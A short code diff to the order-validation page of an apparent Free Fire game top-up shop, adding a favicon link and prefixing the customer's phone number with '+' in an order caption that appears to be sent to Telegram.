--- a/validation.html
+++ b/validation.html
@@ -6,6 +6,7 @@ country: haïti -->
 <html lang="en">
   <head>
     <meta charset="UTF-8" />
+	  <link rel="icon" type="image/png" href="https://i.ibb.co/6RbjvrwL/fam-ofc.jpg"/>
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <title>freefire/shop/Big topup</title>
 <script>
@@ -966,7 +967,7 @@ document.querySelector(".telegram-sub").addEventListener("submit", function(e) {
 
   const caption = `Nouvelle commande ${commandeID}
 Nom : ${nom}
-Téléphone : ${numero}
+Téléphone : +${numero}
 Email : ${email}
 Pays : ${paysNom}
 Mode de paiement : ${modePaiement}
